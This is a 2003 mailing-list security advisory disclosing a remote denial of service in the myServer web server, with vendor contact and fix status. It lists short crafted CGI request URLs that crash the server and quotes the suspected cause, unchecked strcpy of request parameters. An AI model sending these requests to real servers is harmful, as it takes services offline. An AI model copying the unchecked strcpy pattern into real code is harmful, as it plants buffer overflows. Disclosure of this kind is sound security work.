[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE64RQWgrfNVC0005e9c9@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: myServer - Remote Denial of Service
------------------------------------------------------------------
- EXPL-A-2003-012 exploitlabs.com Advisory 012
------------------------------------------------------------------
-= myServer =-
Donnie Werner
July 5, 2003
Vunerability(s):
----------------
Denial of Service
Product:
--------
myServer httpd - 4.2 ( current )
http://myserverweb.sourceforge.net
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip
http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip
Description of product:
-----------------------
"It is a web server that allow everybody to have his own
web server for free. It is easy to configure and manage,
it is available for linux and windows.
It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for
more info."
note:
http://www.securitytracker.com/alerts/2003/Jun/1006999.html
has NOT been fixed as of ver 4.2
http://www.security-protocols.com/print.php?sid=1534
appears fixed or not an issue in 4.2 under win
VUNERABILITY / EXPLOIT
======================
tested on Windows XP / 2k
issuing...
http://[host]/cgi-bin/math_sum.mscgi?a=
http://[host]/cgi-bin/math_sum.mscgi??=
completly crashes the httpd on the remote host
proally cuz..
------------ snip ------------
strcpy(a,cm.GetParam("a"));
strcpy(b,cm.GetParam("b"));
sprintf(c,"%i",atoi(a)+atoi(b));
------------ snip ------------
also..
http://[host]/cgi-bin/post.mscgi???
crashes server
Local:
------
no
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor has responded and claims the fix is in the CVS,
and will be resolved as of the upcomming 4.3 release.
Vendor Contact:
---------------
Concurrent with this advisory
http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904
Credits:
--------
Donnie Werner
morning_wood@...loitlabs.com
http://exploitlabs.com
thank you "nutcase" for confirmation testing
Powered by blists - more mailing lists